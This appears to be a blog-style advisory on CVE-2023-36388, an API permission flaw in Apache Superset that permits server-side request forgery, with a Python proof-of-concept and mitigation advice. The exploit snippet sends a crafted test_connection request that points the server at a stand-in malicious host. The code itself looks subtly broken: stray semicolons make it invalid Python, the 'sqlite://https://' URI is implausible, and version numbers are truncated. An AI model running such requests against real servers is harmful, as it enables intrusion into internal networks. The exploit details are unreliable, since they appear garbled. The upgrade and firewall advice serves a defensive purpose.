CVE-2023-36388 - Exploiting Improper REST API Permission in Apache Superset (Up To and Including v2.1.) for Possible SSRF Attack

A recent vulnerability, CVE-2023-36388, has been discovered in Apache Superset up to and including version 2.1.. This vulnerability occurs due to improper REST API permission, which allows an authenticated Gamma user to test network connections and potentially employ a Server-Side Request Forgery (SSRF) attack. In this post, we will delve into the details of the vulnerability, its exploitation, and how to mitigate it.

Vulnerability Details

Apache Superset (up to v2.1.) suffers from an improper REST API permission vulnerability. In particular, the TestConnectionView API endpoint is accessible to all authenticated Gamma users, which should not be the case. This faulty permission allows an attacker to send arbitrary HTTP requests to any internal and external resources accessible by the server.

Exploit

An attacker can exploit the TestConnectionView API endpoint by crafting an HTTP POST request with a malicious payload. The following Python code snippet demonstrates how an attacker might create the request:

import requests

target_url = "https://example.com/api/v1/database/test_connection";

headers = {
    "Authorization": "Bearer <INSERT_YOUR_ACCESS_TOKEN_HERE>",
    "Content-Type": "application/json"
}

payload = {
    "database_name": "exploit",
    "encrypted_extra": "{}",
    "extras": "{}",
    "impersonate_user": False,
    "server_cert": "",
    "sqlalchemy_uri": "sqlite://https://malicious-url.example";
}

response = requests.post(target_url, json=payload, headers=headers)

Upon successful execution, the server will send an HTTP request to the specified malicious-url.example due to the exploitation of the TestConnectionView API endpoint.

Original References

For more information about the vulnerability and fixes, refer to the original disclosure and official patch notes:

- NVD - CVE-2023-36388
- GitHub Advisory
- Official Fix Commit

Mitigation

The vulnerability has been patched in Apache Superset v2.1.1 and later versions. The fix includes modifying the permission checks and ensuring that the TestConnectionView API endpoint is only accessible to Admin users.

To mitigate this vulnerability, it is highly recommended to upgrade to the latest version of Apache Superset by following the official update and migration guides:

- Update Guide
- Migration Guide

If updating is not an immediate option, you can implement custom firewall rules to block access to the TestConnectionView API endpoint.

Conclusion

CVE-2023-36388 is a critical vulnerability in Apache Superset resulting from improper REST API permission. By exploiting this vulnerability, an attacker can potentially perform SSRF attacks by sending arbitrary HTTP requests to internal and external resources. It is crucial to fix this vulnerability immediately by upgrading to the latest version of Apache Superset or implementing appropriate workarounds to protect your systems and network from potential attacks.

Timeline

Published on: 09/06/2023 13:15:00 UTC
Last modified on: 09/11/2023 14:15:00 UTC